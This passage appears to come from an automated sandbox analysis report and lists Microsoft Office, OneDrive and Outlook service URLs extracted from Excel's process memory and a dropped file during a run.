      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/uZY
      Source: EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comKtz
      Source: EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comPtm
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordD
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com0f
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.neth
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abQ
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.383321801.000000000F6A0000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%Z
      Source: EXCEL.EXE, 00000000.00000003.460004006.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261290511.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349904456.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.462771787.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397630783.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411581844.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.542480026.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383321801.000000000F6A0000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.csv)
      Source: EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.dllt
      Source: EXCEL.EXE, 00000000.00000003.460004006.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261290511.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349904456.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.462771787.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397630783.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411581844.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.542480026.000000000F6A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383321801.000000000F6A0000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.ods)
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com5
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com;
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comAZu
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comE
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comK
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comQ
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comc
      Source: EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comdlll
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.come
      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comh
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comi
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comk
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://officeci.azurewebsites.net/api/=v
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks_
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdatedT
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdatedj
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?iointiwD
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
      Source: EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netj
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://otelrules.azureedge.netG
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comh
      Source: EXCEL.EXE, 00000000.00000002.543359602.0000000012E61000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/ActivitiesMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activitiess
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
